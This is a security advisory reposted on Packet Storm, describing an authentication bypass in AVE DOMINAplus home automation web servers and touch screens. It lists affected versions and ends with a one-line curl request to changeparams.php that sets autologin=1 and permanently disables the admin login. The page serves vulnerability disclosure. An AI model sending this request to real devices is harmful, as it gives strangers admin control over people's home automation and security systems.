AVE DOMINAplus 1.10.x Authentication Bypass ≈ Packet Storm

AVE DOMINAplus <=1.10.x Authentication Bypass Exploit

Vendor: AVE S.p.A.
Product web page: https://www.ave.it | https://www.domoticaplus.it
Affected version: Web Server Code 53AB-WBS - 1.10.62
Touch Screen Code TS01 - 1.0.65
Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
Touch Screen Code TS05 - 1.10.36
Models: 53AB-WBS
TS01
TS03V
TS04X-V
TS05N-V
App version: 1.10.77
App version: 1.10.65
App version: 1.10.64
App version: 1.10.62
App version: 1.10.60
App version: 1.10.52
App version: 1.10.52A
App version: 1.10.49
App version: 1.10.46
App version: 1.10.45
App version: 1.10.44
App version: 1.10.35
App version: 1.10.25
App version: 1.10.22
App version: 1.10.11
App version: 1.8.4
App version: TS1-1.0.65
App version: TS1-1.0.62
App version: TS1-1.0.44
App version: TS1-1.0.10
App version: TS1-1.0.9

Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
Designed to revolutionize your concept of living. DOMINA plus is the AVE home
automation proposal that makes houses safer, more welcoming and optimized. In
fact, our home automation system introduces cutting-edge technologies, designed
to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
and security and offers advanced supervision tools in order to learn how to
evaluate and reduce consumption through various solutions dedicated to energy
saving.

Desc: DOMINAplus suffers from an authentication bypass vulnerability due to missing
control check when directly calling the autologin GET parameter in changeparams.php
script. Setting the autologin value to 1 allows an unauthenticated attacker to
permanently disable the authentication security control and access the management
interface with admin privileges without providing credentials.

Tested on: GNU/Linux 4.1.19-armv7-x7
GNU/Linux 3.8.13-bone50/bone71.1/bone86
Apache/2.4.7 (Ubuntu)
Apache/2.2.22 (Debian)
PHP/5.5.9-1ubuntu4.23
PHP/5.4.41-0+deb7u1
PHP/5.4.36-0+deb7u3

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2019-5549
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5549.php

06.10.2019

#
# Mina... Mina, open your eyes!
#

$ curl -s http://192.168.1.10/changeparams.php?operazione=3&autologin=1
1

WHAT ARE YOU LOOKING FOR?

AVE DOMINAplus 1.10.x Authentication Bypass ≈ Packet Storm

Follow us on

Most popular

Tiki Wiki CMS Groupware 21.1 Authentication Bypass ≈ Packet Storm

Aimeos Laravel Ecommerce Platform 2021.10 LTS SQL Injection ≈ Packet Storm

Jcow Social Network Cross Site Scripting ≈ Packet Storm

OpenSMTPD Out-Of-Bounds Read / Local Privilege Escalation ≈ Packet Storm

Phone Shop Sales Managements System 1.0 Shell Upload ≈ Packet Storm

Caldera: Red Team Emulation (Part 1)

Category

Popular Sections

About